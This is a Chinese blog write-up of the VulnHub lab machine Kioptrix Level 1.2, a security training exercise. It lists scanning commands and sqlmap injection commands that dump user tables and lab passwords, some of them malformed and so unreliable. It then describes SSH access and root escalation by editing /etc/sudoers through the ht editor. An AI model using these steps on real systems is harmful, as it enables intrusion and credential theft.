Kioptrix : Level 1.2

最新推荐文章于 2024-09-14 17:36:44 发布
最新推荐文章于 2024-09-14 17:36:44 发布
阅读量812 收藏 19
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80154010/article/details/142256386
版权

靶机与kali 都 NAT 模式就行

主机发现

arp-scan -l

端口扫描

nmap -sV -sC -sT -O 192.168.215.199 -p-

目录扫描

dirb http://192.168.215.199

浏览器访问:

点击Blog 发现另一个网址

浏览器访问发现访问不进去,那我们在host文件里 添加它试试

再次访问 成功访问到

点击Ligoat Press Room ,将最底下改为VIews ,此时发现url是?id= 尝试sqlmap 一把梭

python3 sqlmap.py -u "kioptrix3.com --dbs --batch

python3 sqlmap.py -u "kioptrix3.com -D gallery --tables --batch

python3 sqlmap.py -u "kioptrix3.com -D gallery -T gallarific_users --columns --batch

python3 sqlmap.py -u "kioptrix3.com -D gallery -T gallarific_users -C username --dump --batch

python3 sqlmap.py -u "kioptrix3.com -D gallery -T gallarific_users -C password --dump --batch

从 gallarific_users 这个表我们找到了 一组用户密码 admin n0t7t1k4

同样的方法看下 dev_accounts这个表

python3 sqlmap.py -u "kioptrix3.com -D gallery -T dev_accounts --dump --batch

在这个表 我们找到两组用户密码 dreg Mast3r ; loneferret starwars

getshell

因为开启了22端口,我们利用这些用户信息进行ssh连接

由于kali用ssh连接会报错我们用finalshell连接 ,

经过测试 loneferret 用户可以连接成功

提权

sudo -l

sudo /usr/local/bin/ht

进入这个页面

F3 搜索 /etc/sodoers 回车

ht 后面添加 ,/bin/bash

F2 保存 F10 退出

输入以下命令

sudo /bin/bash

提权成功

Gigity123
关注
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1092
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
KIOPTRIX: LEVEL 1.2 (#3)
Mysmycbx的博客
03-21 247
发现是lotusCMS,在searchsploit上搜索,没有发现什么有用的信息,那就去google上搜索。发现github里有一个RCE的sh文件,这里下载下来查看。发现mysql数据库内容,这里尝试ssh登录,发现失败,那就进入mysql查看后台数据。没发现什么有用的信息。
【vulnhub靶场】Kioptrix : Level 1.2靶机提权
qq_46421742的博客
07-26 323
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Vulnhub靶机:Kioptrix_Level1.2
qq_48904485的博客
03-14 469
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
vulnhub-KIOPTRIX: LEVEL 1.2 (#3)-KioptrixVM3靶场
shulao2010的博客
05-23 399
一个单机靶场,讲解了如何通过简单web漏洞获得主机root权限
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2
LYJ20010728的博客
08-09 1244
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2环境下载KIOPTRIX: LEVEL 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 KIOPTRIX: LEVEL 1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.135 用Nmap探测一下目标靶机IP的端口
【vulnhub】Kioptrix : Level 1.2
wbplife的博客
07-29 305
使用了一个python版本的exp:GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit。将exp下载下来,使用web服务上传到靶机,编译执行,在/etc/passwd文件写入一个具有root权限的用户。使用searchsploit搜索LotusCMS的历史漏洞,发现该CMS版本为3.0时存在命令执行漏洞。运行这个编译过后的文件,设置密码123456,会自动生成一个用户,跳转到这个用户。监听444端口,因为从下载的文件说明中可知,监听端口必须是444。
Kioptrix : Level 1.2复现
weixin_61982677的博客
09-14 248
发现 3 个界面,点击 login 这个界面应该就是CMS后台的登录界面了。发现可以利用,提示我们输入可用 ip,也就是反弹 shell 的 ip。F10 退出再次运行sudo -l查看权限,可以看到已经有ALL权限了。将 kali 与 靶机 的网络模式设置为 NAT 模式。发现两个用户和密码的 hash,密码加密应该是md5。查看其他文件,发现一个配置文件,发现数据库账户密码。同样发现一个用户密码 admin/n0t7t1k4。没有 sudo 权限,尝试另一个用户。尝试查看/etc/passwd。
Vulnhub靶机:Kioptrix : Level 1.2
whoami
09-14 780
Vulnhub靶机:Kioptrix : Level 1.2实战
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
健身房管理系统代码系统 Springboot健身房管理系统(程序,中文注释)
09-26
健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统 1、资源说明:健身房管理系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、M
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
09-26
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
电池镍片自动检测设备_三维3D设计图纸.zip
09-26
电池镍片自动检测设备_三维3D设计图纸.zip
小微园区数字化建设方案.pptx
09-26
小微园区数字化建设方案
python科学数据笔记(Python Scientific lecture notes) 英文版
最新发布
09-26
主要介绍如何使用python来处理科学的大数据,NumPy,Matplotlib等都有大量的实例 I Getting started with Python for science 2 1 Scientific computing with tools and workflow 3 2 The Python language 8 3 NumPy: creating and manipulating numerical data 5 Matplotlib 6 Scipy : high-level scientific com II Advanced topics 7 Advanced Python Constructs 8 Advanced Numpy 9 Debugging code 10 Optimizing code 12 Image manipulation and processing using Numpy and Scipy
OpenGL高级编程与可视化系统开发-高级编程篇(2-10章).zip
09-26
OpenGL高级编程与可视化系统开发-高级编程篇(2-10章).zip
齿轮齿条式转向系统3D模型图纸 Solidworks设计 附STP.zip
09-26
齿轮齿条式转向系统3D模型图纸 Solidworks设计 附STP.zip
Kioptrix Level 1.2 (#3)靶机攻破:信息收集与权限提升
"Kioptrix: Level 1.2 (#3) 是一款Vulnhub靶机,用于网络安全和渗透测试练习。靶机IP为192.168.190.189,需配置host指向kioptrix3.com。攻破靶机涉及信息收集、漏洞利用、GETShell以及提权等技能,主要工具包括dirb...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值